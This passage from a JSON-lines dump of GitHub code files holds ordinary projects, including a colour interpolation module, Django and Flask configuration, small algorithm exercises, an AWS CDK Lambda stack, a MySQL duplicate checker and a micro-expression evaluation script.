86.0500])\n >>> x = np.arange(len(y))\n >>> f = SpragueInterpolator(x, y)\n >>> f(0.5) # doctest: +ELLIPSIS\n 7.2185025...\n\n Interpolating an *array_like* variable:\n\n >>> f([0.25, 0.75]) # doctest: +ELLIPSIS\n array([ 6.7295161..., 7.8140625...])\n \"\"\"\n\n SPRAGUE_C_COEFFICIENTS = np.array(\n [[884, -1960, 3033, -2648, 1080, -180],\n [508, -540, 488, -367, 144, -24],\n [-24, 144, -367, 488, -540, 508],\n [-180, 1080, -2648, 3033, -1960, 884]])\n \"\"\"\n Defines the coefficients used to generate extra points for boundaries\n interpolation.\n\n SPRAGUE_C_COEFFICIENTS : array_like, (4, 6)\n\n References\n ----------\n .. [3] CIE TC 1-38. (2005). Table V. Values of the c-coefficients of\n Equ.s 6 and 7. In CIE 167:2005 Recommended Practice for Tabulating\n Spectral Data for Use in Colour Computations (p. 19).\n ISBN:978-3-901-90641-1\n \"\"\"\n\n def __init__(self, x=None, y=None):\n self._xp = None\n self._yp = None\n\n self.__x = None\n self.x = x\n self.__y = None\n self.y = y\n\n self._validate_dimensions()\n\n @property\n def x(self):\n \"\"\"\n Property for **self.__x** private attribute.\n\n Returns\n -------\n array_like\n self.__x\n \"\"\"\n\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"\n Setter for **self.__x** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"x\" independent variable must have exactly one dimension!')\n\n value_interval = interval(value)[0]\n\n xp1 = value[0] - value_interval * 2\n xp2 = value[0] - value_interval\n xp3 = value[-1] + value_interval\n xp4 = value[-1] + value_interval * 2\n\n self._xp = np.concatenate(((xp1, xp2), value, (xp3, xp4)))\n\n self.__x = value\n\n @property\n def y(self):\n \"\"\"\n Property for **self.__y** private attribute.\n\n Returns\n -------\n array_like\n self.__y\n \"\"\"\n\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Setter for **self.__y** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n if value is not None:\n value = np.atleast_1d(value).astype(np.float_)\n\n assert value.ndim == 1, (\n '\"y\" dependent variable must have exactly one dimension!')\n\n assert len(value) >= 6, (\n '\"y\" dependent variable values count must be in domain [6:]!')\n\n yp1 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[0],\n np.array(value[0:6]).reshape((6, 1)))) / 209)[0]\n yp2 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[1],\n np.array(value[0:6]).reshape((6, 1)))) / 209)[0]\n yp3 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[2],\n np.array(value[-6:]).reshape((6, 1)))) / 209)[0]\n yp4 = np.ravel((np.dot(\n self.SPRAGUE_C_COEFFICIENTS[3],\n np.array(value[-6:]).reshape((6, 1)))) / 209)[0]\n\n self._yp = np.concatenate(((yp1, yp2), value, (yp3, yp4)))\n\n self.__y = value\n\n def __call__(self, x):\n \"\"\"\n Evaluates the interpolating polynomial at given point(s).\n\n Parameters\n ----------\n x : numeric or array_like\n Point(s) to evaluate the interpolant at.\n\n Returns\n -------\n numeric or ndarray\n Interpolated value(s).\n \"\"\"\n\n return self._evaluate(x)\n\n def _evaluate(self, x):\n \"\"\"\n Performs the interpolating polynomial evaluation at given point.\n\n Parameters\n ----------\n x : numeric\n Point to evaluate the interpolant at.\n\n Returns\n -------\n float\n Interpolated point values.\n \"\"\"\n\n x = np.asarray(x)\n\n self._validate_dimensions()\n self._validate_interpolation_range(x)\n\n i = np.searchsorted(self._xp, x) - 1\n X = (x - self._xp[i]) / (self._xp[i + 1] - self._xp[i])\n\n r = self._yp\n\n a0p = r[i]\n a1p = ((2 * r[i - 2] - 16 * r[i - 1] + 16 * r[i + 1] - 2 *\n r[i + 2]) / 24)\n a2p = ((-r[i - 2] + 16 * r[i - 1] - 30 * r[i] + 16 * r[i + 1] -\n r[i + 2]) / 24)\n a3p = ((-9 * r[i - 2] + 39 * r[i - 1] - 70 * r[i] + 66 *\n r[i + 1] - 33 * r[i + 2] + 7 * r[i + 3]) / 24)\n a4p = ((13 * r[i - 2] - 64 * r[i - 1] + 126 * r[i] - 124 *\n r[i + 1] + 61 * r[i + 2] - 12 * r[i + 3]) / 24)\n a5p = ((-5 * r[i - 2] + 25 * r[i - 1] - 50 * r[i] + 50 *\n r[i + 1] - 25 * r[i + 2] + 5 * r[i + 3]) / 24)\n\n y = (a0p + a1p * X + a2p * X ** 2 + a3p * X ** 3 + a4p * X ** 4 +\n a5p * X ** 5)\n\n return y\n\n def _validate_dimensions(self):\n \"\"\"\n Validates variables dimensions to be the same.\n \"\"\"\n\n if len(self.__x) != len(self.__y):\n raise ValueError(\n ('\"x\" independent and \"y\" dependent variables have different '\n 'dimensions: \"{0}\", \"{1}\"').format(len(self.__x),\n len(self.__y)))\n\n def _validate_interpolation_range(self, x):\n \"\"\"\n Validates given point to be in interpolation range.\n \"\"\"\n\n below_interpolation_range = x < self.__x[0]\n above_interpolation_range = x > self.__x[-1]\n\n if below_interpolation_range.any():\n raise ValueError('\"{0}\" is below interpolation range.'.format(x))\n\n if above_interpolation_range.any():\n raise ValueError('\"{0}\" is above interpolation range.'.format(x))\n\n\nclass CubicSplineInterpolator(scipy.interpolate.interp1d):\n \"\"\"\n Interpolates a 1-D function using cubic spline interpolation.\n\n Notes\n -----\n This class is a wrapper around *scipy.interpolate.interp1d* class.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(CubicSplineInterpolator, self).__init__(\n kind='cubic', *args, **kwargs)\n\n\nclass PchipInterpolator(scipy.interpolate.PchipInterpolator):\n \"\"\"\n Interpolates a 1-D function using Piecewise Cubic Hermite Interpolating\n Polynomial interpolation.\n\n Notes\n -----\n This class is a wrapper around *scipy.interpolate.PchipInterpolator*\n class.\n \"\"\"\n\n def __init__(self, x=None, y=None, *args, **kwargs):\n super(PchipInterpolator, self).__init__(x, y, *args, **kwargs)\n\n self.__y = y\n\n @property\n def y(self):\n \"\"\"\n Property for **self.__y** private attribute.\n\n Returns\n -------\n array_like\n self.__y\n \"\"\"\n\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"\n Setter for **self.__y** private attribute.\n\n Parameters\n ----------\n value : array_like\n Attribute value.\n \"\"\"\n\n raise AttributeError('\"{0}\" attribute is read only!'.format('y'))\n\n\ndef lagrange_coefficients(r, n=4):\n \"\"\"\n Computes the *Lagrange Coefficients* at given point :math:`r` for degree\n :math:`n`.\n\n Parameters\n ----------\n r : numeric\n Point to get the *Lagrange Coefficients* at.\n n : int, optional\n Degree of the *Lagrange Coefficients* being calculated.\n\n Returns\n -------\n ndarray\n\n References\n ----------\n .. [4] Fairman, H. S. (1985). The calculation of weight factors for\n tristimulus integration. Color Research & Application, 10(4),\n 199–203. doi:10.1002/col.5080100407\n .. [5] Wikipedia. (n.d.). Lagrange polynomial - Definition. Retrieved\n January 20, 2016, from\n https://en.wikipedia.org/wiki/Lagrange_polynomial#Definition\n\n Examples\n --------\n >>> lagrange_coefficients(0.1)\n array([ 0.8265, 0.2755, -0.1305, 0.0285])\n \"\"\"\n\n r_i = np.arange(n)\n L_n = []\n for j in range(len(r_i)):\n basis = [(r - r_i[i]) / (r_i[j] - r_i[i])\n for i in range(len(r_i)) if i != j]\n L_n.append(reduce(lambda x, y: x * y, basis)) # noqa\n\n return np.array(L_n)\n","repo_name":"scoopxyz/colour","sub_path":"colour/algebra/interpolation.py","file_name":"interpolation.py","file_ext":"py","file_size_in_byte":15592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"17848747936","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\n\nurlpatterns = patterns('',\n (r'^admin/', include('django.contrib.admin.urls')),\n (r'^i18n/', include('django.conf.urls.i18n')),\n (r'^r/', include('django.conf.urls.shortcut')),\n #\n (r'^concerts/', include('concerts.urls')),\n (r'^documents/', include('documents.urls')),\n (r'^links/', include('links.urls')),\n (r'^programmes/', include('programmes.urls')),\n (r'^singers/', include('singers.urls')),\n #\n (r'^', include('articles.urls')),\n)\n\nif settings.LOCAL_DEV:\n urlpatterns = patterns('',\n (r'^media-lieder/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT,\n 'show_indexes': True, }),\n) + urlpatterns","repo_name":"funollet/lieder-web","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4196072583","text":"def ini():\n n = input()\n return int(n)\n\n\ntestCase = ini()\nwhile testCase > 0:\n testCase-=1\n n,m=(int(i) for i in input().split())\n l = (int(i) for i in input().split())\n print(min(m,sum(l)))","repo_name":"mdskrumi/Online-Judge-Problem-Solutions","sub_path":"CF/NotOne/A. Grade Allocation.py","file_name":"A. Grade Allocation.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"41928987719","text":"from copy import deepcopy\nfrom scipy.spatial.distance import euclidean as dist\nfrom random import random\nimport math as m\n\nclass Circle:\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.r = r\n self.index = None\n \n def is_intersect(self, other):\n self_xy = [self.x, self.y]\n other_xy = [other.x, other.y]\n return dist(self_xy, other_xy) <= self.r + other.r\n \n def try_to_move(self, dx, dy, min_x, max_x, min_y, max_y):\n res = deepcopy(self)\n new_x = res.x + (2 * random() - 1) * dx\n new_y = res.y + (2 * random() - 1) * dy\n\n if new_x >= max_x - self.r:\n new_x = max_x - self.r\n\n if new_x <= min_x + self.r:\n new_x = min_x + self.r\n\n if new_y >= max_y - self.r:\n new_y = max_y - self.r\n\n if new_y <= min_y + self.r:\n new_y = min_y + self.r\n \n res.x = new_x\n res.y = new_y\n \n return res\n \n def get_area(self):\n return m.pi * self.r * self.r","repo_name":"mrmrmr7/diploma","sub_path":"percolation/dimension2/circle/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15608577635","text":"def solution(n):\n answer = 0\n ternary = ''\n\n while n:\n ternary += str(n % 3)\n n //= 3\n\n for i in reversed(range(len(ternary))):\n answer += int(ternary[i]) * (3 ** (len(ternary) - i - 1))\n\n return answer","repo_name":"JooaeSon/Daily_CodingTest","sub_path":"Programmers/Lv.1/3진법 뒤집기.py","file_name":"3진법 뒤집기.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2054810887","text":"from aws_cdk import (\n aws_iam as iam,\n aws_lambda,\n core\n)\n\n\nclass LambdaStack(core.NestedStack):\n def __init__(self, scope, id, *, name=None, directory=None, bucket=None, key=None) -> None:\n super().__init__(scope, id)\n # ==================================================\n # ================= IAM ROLE =======================\n # ==================================================\n lambda_role = iam.Role(\n scope=self,\n id='lambda_role',\n assumed_by=iam.ServicePrincipal(service='lambda.amazonaws.com'),\n managed_policies=[iam.ManagedPolicy.from_aws_managed_policy_name('AWSLambdaExecute')]\n )\n\n # ==================================================\n # =================== ECR IMAGE ====================\n # ==================================================\n ecr_image = aws_lambda.DockerImageCode.from_image_asset(\n repository_name=name,\n directory=directory\n )\n\n # ==================================================\n # ================ LAMBDA FUNCTION =================\n # ==================================================\n self.lambda_function = aws_lambda.DockerImageFunction(\n scope=self,\n id='lambda',\n function_name=name,\n code=ecr_image,\n memory_size=1024,\n role=lambda_role,\n environment={\n 'BUCKET': bucket,\n 'KEY': key\n },\n timeout=core.Duration.seconds(60)\n )\n","repo_name":"sofianhamiti/aws-lambda-multi-model-express-workflow","sub_path":"stacks/lambda_stack.py","file_name":"lambda_stack.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"17159830699","text":"# Python Packages\r\nimport os\r\nimport unittest\r\nimport random\r\n\r\n# Own Packages\r\nfrom dataloaders.synthia.dataset_synthia import SynthiaRandCityscapesDataset\r\nfrom dataloaders.cityscapes.dataset_cityscapes_semantic import CityscapesSemanticDataset\r\nfrom cfg.config_training import get_cfg_dataset_defaults\r\n\r\n# Dependencies\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nfrom torch.utils.data import DataLoader\r\nimport numpy as np\r\n\r\n\r\nclass TestSynthiaDataset(unittest.TestCase):\r\n \"\"\"\r\n This is not really a test class, but it is simply used to visualize and plot differences in the data\r\n across cityscapes and synthia, to verify that they are loaded similarly\r\n \"\"\"\r\n\r\n def setUp(self):\r\n np.random.seed(0)\r\n torch.manual_seed(0)\r\n random.seed(0)\r\n path_16 = os.path.join('dataloaders', 'tests', 'data', 'synthia_16.yaml')\r\n cfg_16 = get_cfg_dataset_defaults()\r\n cfg_16.merge_from_file(path_16)\r\n cfg_16.freeze()\r\n ds_16 = SynthiaRandCityscapesDataset(mode='train', split=None, cfg=cfg_16)\r\n self.s_loader = DataLoader(ds_16, batch_size=1, shuffle=False, num_workers=0, pin_memory=True, drop_last=True)\r\n path_16 = os.path.join('dataloaders', 'tests', 'data', 'cityscapes_semantic_16.yaml')\r\n cfg_16 = get_cfg_dataset_defaults()\r\n cfg_16.merge_from_file(path_16)\r\n cfg_16.freeze()\r\n ds_16 = CityscapesSemanticDataset('train', None, cfg=cfg_16)\r\n self.c_loader = DataLoader(ds_16, batch_size=1, shuffle=False, num_workers=0, pin_memory=True, drop_last=True)\r\n\r\n def testPlotImages(self):\r\n self.setUp()\r\n for batch_idx, data in enumerate(zip(self.s_loader, self.c_loader)):\r\n print(np.max(data[0][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n print(np.min(data[0][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n print(np.max(data[1][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n print(np.min(data[1][('rgb', 0)][0].numpy().transpose(1, 2, 0)))\r\n fig, (ax1, ax2) = plt.subplots(1, 2)\r\n ax1.imshow(data[0][('rgb', 0)][0].numpy().transpose(1, 2, 0))\r\n ax2.imshow(data[1][('rgb', 0)][0].numpy().transpose(1, 2, 0))\r\n plt.show()","repo_name":"BenBausch/Depth-Semantic-UDA","sub_path":"dataloaders/tests/test_diff_synthia_cityscapes.py","file_name":"test_diff_synthia_cityscapes.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31857412344","text":"from collections import deque\nfrom queue import Queue\n\ngraph = {\n 'A': ['B'],\n 'B': ['A', 'C', 'H'],\n 'C': ['B', 'D'],\n 'D': ['C', 'E', 'G'],\n 'E': ['D', 'F'],\n 'F': ['E'],\n 'G': ['D'],\n 'H': ['B', 'I', 'J', 'M'],\n 'I': ['H'],\n 'J': ['H', 'K'],\n 'K': ['J', 'L'],\n 'L': ['K'],\n 'M': ['H']\n}\n# 한 노드를 중심으로 연결 관계가 있는 노드를 모두 표현해준다\n\n\ndef bfs(graph, root):\n visited = []\n queue = Queue()\n\n queue.put(root)\n\n while not queue.empty():\n node = queue.get()\n\n if node not in visited:\n visited.append(node)\n\n for next_node in graph[node]:\n queue.put(next_node)\n\n print(visited)\n return visited\n\n\ndef bfs_recursive(graph, queue: Queue, path):\n if not queue:\n return\n\n node = queue.get()\n\n\nif __name__ == \"__main__\":\n bfs(graph, 'A')\n","repo_name":"onikss793/algo","sub_path":"sorts/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4839364386","text":"from __main__ import app\r\nimport flask \r\nfrom forms import MyForm\r\n\r\n@app.route('/',methods=['GET','POST'])\r\ndef home():\r\n\tname = None\r\n\tcvform = MyForm()\r\n\tif cvform.validate_on_submit():\r\n\t\tname = cvform.name.data\r\n\t\tcvform.name.data = ''\r\n\r\n\treturn flask.render_template('index.html', form = cvform,user_class = 'white' )\r\n\r\nprint('routes')","repo_name":"MiniManch/DI_Bootcamp","sub_path":"Week-12/Day-2/Daily-Challenge/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22591231299","text":"import mysql.connector\nfrom mysql.connector import Error\nfrom datetime import datetime\nimport logging\n\n\ndef insertTableData(err, sample, machine):\n sql = \"INSERT INTO table (event,sample,time,done,file,machine) VALUES (%s,%s,%s,%s,%s,%s);\"\n val = (err, sample, datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 0, \"none\", machine)\n try:\n connection = mysql.connector.connect(host='host', database='database', user='user',\n password='password')\n if connection.is_connected():\n with open('Errorlog.log') as f:\n if str(err) + \" | \" + str(sample) + \" | \" + str(machine) + \"\\n\" in f.read():\n o = 0\n cursor = connection.cursor()\n else:\n logging.error(str(err) + \" | \" + str(sample) + \" | \" + str(machine) + \"\\n\")\n cursor = connection.cursor()\n cursor.execute(sql, val)\n connection.commit()\n except Error as e:\n logging.error(\"Error while connecting to MySQL\", e)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\ndef checkDuplicateSample():\n try:\n connection = mysql.connector.connect(host='host',\n database='database',\n user='user',\n password='password')\n if connection.is_connected():\n cursor = connection.cursor()\n cursor.execute(\n \"SELECT sample_id, COUNT(sample_id) FROM table GROUP BY sample_id HAVING COUNT(sample_id) > 1;\")\n record = cursor.fetchall()\n for sample in record:\n if \"EMPTY\" in sample:\n continue\n cursor = connection.cursor()\n cursor.execute(\"SELECT machine FROM table WHERE sample_id = '\" + sample[0] + \"';\")\n rec = cursor.fetchall()\n try:\n machine = \"MACHINE_\" + str(rec[0][0]) + \" | \" + \"MACHINE_\" + str(rec[1][0])\n except:\n machine = \"MACHINE_\" + str(rec[0][0]) + \" | \" + \"MACHINE_\" + str(rec[1][0])\n insertTableData(\"duplicate sample ID\", sample[0], machine)\n except Error as e:\n Errorlog.error(\"Error while connecting to MySQL\", e)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\ndef checkDuplicatePlate():\n try:\n connection = mysql.connector.connect(host='host',\n database='database',\n user='user',\n password='password')\n if connection.is_connected():\n cursor = connection.cursor()\n cursor.execute(\"SELECT DISTINCT(plate_id) FROM table;\")\n record = cursor.fetchall()\n for plate in record:\n if \"EMPTY\" in plate:\n continue\n cur = connection.cursor()\n cur.execute(\"SELECT max(DISTINCT run) FROM table WHERE plate_id = '\" + str(plate[0]) + \"';\")\n rec = cur.fetchall()\n cu = connection.cursor()\n cu.execute(\n \"SELECT DISTINCT(plate_id), COUNT(plate_id) FROM table WHERE plate_id = '\" + str(\n plate[0]) + \"' GROUP BY plate_id HAVING COUNT(plate_id) >\" + str(\n rec[0][0] * 93) + \";\")\n rem = cu.fetchall()\n curs = connection.cursor()\n try:\n curs.execute(\"SELECT DISTINCT machine FROM table WHERE plate_id = '\" + str(rem[0][0]) + \"';\")\n except:\n continue\n re = curs.fetchall()\n try:\n machine = \"MACHINE_\" + str(re[0][0]) + \" | \" + \"MACHINE_\" + str(re[1][0])\n except:\n machine = \"MACHINE_\" + str(re[0][0]) + \" | \" + \"MACHINE_\" + str(re[0][0])\n insertTableData(\"duplicate plate ID\", rem[0][0], machine)\n except Error as e:\n Errorlog.error(\"Error while connecting to MySQL\", e)\n finally:\n if connection.is_connected():\n cursor.close()\n connection.close()\n\n\nif __name__ == '__main__':\n logging.basicConfig(filename=\"Errorlog.log\", level=logging.ERROR)\n checkDuplicateSample()\n checkDuplicatePlate()\n","repo_name":"momongoose/PythonScripts","sub_path":"ErrorCheckerDB.py","file_name":"ErrorCheckerDB.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32702185502","text":"from app.models import db, User, Friend, environment, SCHEMA, Friend\nfrom sqlalchemy import or_, and_\n\ndef seed_friends():\n users = User.query.all()[:5]\n\n for i in range(len(users)):\n user1 = users[i]\n for j in range(len(users)):\n if j != i:\n user2 = users[j]\n friendship = Friend.query.filter(\n or_(and_(Friend.from_user_id == user1.id, Friend.to_user_id == user2.id),\n and_(Friend.from_user_id == user2.id, Friend.to_user_id == user1.id))).first()\n if not friendship:\n is_confirmed = j % 2 == 0\n friend = Friend(\n from_user_id= user1.id,\n to_user_id = user2.id,\n is_confirmed=is_confirmed\n )\n db.session.add(friend)\n \n db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE or DELETE the users table. SQLAlchemy doesn't\n# have a built in function to do this. With postgres in production TRUNCATE\n# removes all the data from the table, and RESET IDENTITY resets the auto\n# incrementing primary key, CASCADE deletes any dependent entities. With\n# sqlite3 in development you need to instead use DELETE to remove all data and\n# it will reset the primary keys for you as well.\ndef undo_friends():\n if environment == \"production\":\n db.session.execute(\n f\"TRUNCATE table {SCHEMA}.friends RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(\"DELETE FROM friends\")\n\n db.session.commit()\n","repo_name":"OneBoatFly/venmo-clone","sub_path":"app/seeds/friends.py","file_name":"friends.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40960055015","text":"import csv\r\nimport multiprocessing\r\nimport os\r\nimport pickle\r\nimport shutil\r\n\r\nimport numpy as np\r\nimport xlrd\r\nimport cas_util as CAS\r\n\r\ndef read_casme2_video(video_path):\r\n start_sub, end_sub = 3, -4 #前2帧 后三帧都不要\r\n files = [i for i in os.listdir(video_path) if 'jpg' in i]\r\n files.sort(key=lambda x: int(x[start_sub:end_sub]))\r\n files = [os.path.join(video_path, i) for i in files]\r\n return files\r\n\r\ndef read_casme2_label(label_path, fps):\r\n # 宏观表情平均持续39帧(30fps)\r\n mic_default_d = int(fps * 2 / 3)\r\n\r\n data_xls = xlrd.open_workbook(label_path)\r\n table_xls = data_xls.sheets()[0]\r\n\r\n labels = {}\r\n s = [15, 16, 19, 20, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 40]\r\n dir = {\"disgust1\": \"0101\", \"disgust2\": \"0102\", \"anger1\": \"0401\", \"anger2\": \"0402\", \"happy1\": \"0502\",\r\n \"happy2\": \"0503\", \"happy3\": \"0505\", \"happy4\": \"0507\", \"happy5\": \"0508\"}\r\n # for i_row in table_xls:\r\n # key = i_row[10].value\r\n for i_row in table_xls.get_rows():\r\n snum = s[int(i_row[0].value) - 1]\r\n cla = i_row[1].value.split(\"_\")[0]\r\n clanum = dir[cla]\r\n subnum = str(snum) + '_' + clanum # 15_0401\r\n # print(subnum)\r\n key = subnum\r\n if key not in labels:\r\n labels[key] = []\r\n labels[key].append([int(i_cell.value) for i_cell in i_row[2:5]])\r\n\r\n labels = {k: np.array([[i_row[0], i_row[2] if i_row[2] else i_row[1] + mic_default_d] for i_row in v])\r\n for k, v in labels.items()}\r\n return labels\r\ndef metrics(label_slice, predict_slice, mic_frame, dataset_root_path, debug_message=True):\r\n n_pre_micro = int(((predict_slice[:, 1] - predict_slice[:, 0]) <= mic_frame).sum()) if predict_slice.shape[0] else 0\r\n #按照长度mic_frame 区分微表情\r\n tp = 0\r\n tp_mic = 0\r\n\r\n # 修正标注1开始,预测0开始\r\n predict_slice += 1\r\n\r\n FPPP = []\r\n for label_start, label_end in label_slice.tolist():\r\n percent = 0\r\n for j, (predict_start, predict_end) in enumerate(predict_slice.tolist()):\r\n if not (predict_end < label_start or predict_start > label_end):\r\n\r\n all_points = sorted([label_start, label_end, predict_start, predict_end])\r\n percent = (float(all_points[2] - all_points[1])) / (all_points[3] - all_points[0])\r\n\r\n\r\n\r\n\r\n\r\n if percent >= 0.5:\r\n tp += 1\r\n # !!!!!注意这里评价为tp的标准是 label段长度小于micframe就是label micro\r\n if label_end - label_start <= mic_frame: # !!!!!!!!!!label的micro不是读的excel 而是按照长度mic_frame 区分\r\n tp_mic+= 1\r\n FPPP.append(j)\r\n if debug_message:\r\n print(f'lable:{label_start},{label_end} test:{predict_start},{predict_end} percent={percent}')\r\n\r\n with open('./valcas^2re/valcas_sqr.csv', 'a', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([dataset_root_path, label_start, label_end, predict_start, predict_end, 'TP'])\r\n break\r\n\r\n if percent < 0.5: #一个gt与所有的预测段 算IOU 都没有大于0.5的\r\n if debug_message:\r\n print(f'lable:{label_start},{label_end} 没有正确结果')\r\n with open('./valcas^2re/valcas_sqr.csv', 'a', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([dataset_root_path, label_start, label_end, '', '', 'FN'])\r\n\r\n FPPP = list(set(FPPP))\r\n for j, (predict_start, predict_end) in enumerate(predict_slice):\r\n if j not in FPPP:\r\n with open('./valcas^2re/valcas_sqr.csv', 'a', newline='') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([dataset_root_path, '', '', predict_start, predict_end, 'FP'])\r\n\r\n return tp, tp_mic, len(label_slice), len(predict_slice), n_pre_micro\r\n\r\ndef casme2_worker( sub, i_worker, debug_message=False):\r\n # dataset_root_path = \"D:/graduate/medata/casmesqr/rawpic\"\r\n # # 'C:\\\\sheng\\\\casme2\\\\rawpic'\r\n # label_path = \"D:/graduate/medata/casmesqr/CAS(ME)^2code_final(Updated).xlsx\"\r\n dataset_root_path = '/space0/qinwf/MEdata/casmesqr/rawpic'#'/space0/qinwf/MEdata/openface_cas^2'#\r\n #\"/space0/qinwf/DATA/casmesqr/rawpic\"\r\n # \"D:/graduate/medata/casmesqr/rawpic\"\r\n label_path = '/space0/qinwf/MEdata/casmesqr/CAS(ME)^2code_final(Updated).xlsx'\r\n #\"/space0/qinwf/DATA/casmesqr/CAS(ME)^2code_final(Updated).xlsx\"\r\n # 'CAS(ME)^2code_final.xls'\r\n\r\n fps = 30\r\n mic_frame = fps // 2 #15帧 低于15帧的label 按照micro 0.5s EXCEL里<=15的都是mic\r\n result = []\r\n\r\n sub_path = os.path.join(dataset_root_path, sub)\r\n videos = os.listdir(sub_path)\r\n labels = read_casme2_label(label_path, fps)\r\n for i_video in videos:\r\n # CAS(ME)^2\r\n #files = read_casme2_video(os.path.join(dataset_root_path, sub, i_video))#s15\\15_0101disgustingteeth\r\n predict = CAS.draw_roiline19(sub_path , i_video , 3, -4,1)\r\n pp=predict.tolist()\r\n vionum = i_video[0:7] # 15_0101\r\n print(\"vionum:{}\".format(vionum))\r\n print(\"this vio 预测段:{}\".format(pp)) # 这个vio预测的输出全部段\r\n if vionum not in labels.keys(): # !!!!!!!!!!!!!!!!!!!!!! 115_0508这个excel没有label 没有1 happy5\r\n print(\"excel without label:{}\".format(vionum))\r\n continue\r\n gt = labels[vionum]\r\n print(\"this vio gt段:{}\".format(gt))\r\n\r\n i_video_relative = sub + '_' + i_video\r\n # gt = labels[i_video_relative] if i_video_relative in labels else np.array([])\r\n result.append(metrics(gt, predict, mic_frame, i_video_relative))\r\n\r\n result = [np.array([j[i] for j in result]).sum(axis=0) for i in range(5)]\r\n\r\n with open(f'./valcas^2re/casmesqr_{i_worker}.pkl', 'wb') as f:\r\n pickle.dump(result, f)\r\n #pickle可以将对象数据压到一个文件中,永久保存。这样在取用时,只需将该文件中的数据取出。而不是每次都重新进过各种语句,处理得到对象数据。\r\n\r\n if debug_message:\r\n print(f'{i_worker} finished')\r\ndef report( n_gt, n_pred, tp, prefix='', show_message=True):\r\n precision = tp / n_pred\r\n recall = tp / n_gt\r\n f1 = (2 * precision * recall) / (precision + recall)\r\n\r\n if show_message:\r\n print('------------------')\r\n print(f\"{prefix}精准率::{precision}\")\r\n print(f\"{prefix}召回率:{recall}\")\r\n print(f\"{prefix}F1系数:{f1}\")\r\n # print(f\"{prefix}精准率:{','.join([f'{i:20}' for i in precision])}\")\r\n # print(f\"{prefix}召回率:{','.join([f'{i:20}' for i in recall])}\")\r\n # print(f\"{prefix}F1系数:{','.join([f'{i:20}' for i in f1])}\")\r\n return precision, recall, f1\r\ndef main_casme2( show_message=True):\r\n dataset_root_path = \"/space0/qinwf/MEdata/casmesqr/rawpic\"\r\n #\"/space0/qinwf/DATA/casmesqr/rawpic\"\r\n #\"D:/graduate/medata/casmesqr/rawpic\"\r\n sub_list = os.listdir(dataset_root_path)#s15 s16 s19...\r\n # sub_list =['s15','s16']\r\n n_result = len(sub_list)#22\r\n n_worker = min(25, n_result)\r\n #\r\n pool = multiprocessing.Pool(n_worker)#22个sub 22个进程\r\n for i_worker, i_sub in enumerate(sub_list):\r\n casme2_worker(i_sub, i_worker)\r\n pool.apply_async(casme2_worker, (i_sub, i_worker))\r\n #apply_async是异步非阻塞的 不用等待当前进程执行完毕,随时根据系统调度来进行进程切换\r\n pool.close()\r\n pool.join()\r\n\r\n gather_result = []\r\n for i_worker in range(n_result):\r\n with open(f'./valcas^2re/casmesqr_{i_worker}.pkl', 'rb') as f:\r\n gather_result.append(pickle.load(f))\r\n\r\n tp = np.array([i[0] for i in gather_result]).sum(axis=0)\r\n tp_mic = np.array([i[1] for i in gather_result]).sum(axis=0)\r\n tp_mac = tp-tp_mic\r\n n_gt = np.array([i[2] for i in gather_result]).sum(axis=0)\r\n n_pred = np.array([i[3] for i in gather_result]).sum(axis=0)\r\n n_pred_mic = np.array([i[4] for i in gather_result]).sum(axis=0)\r\n n_pred_mac = n_pred - 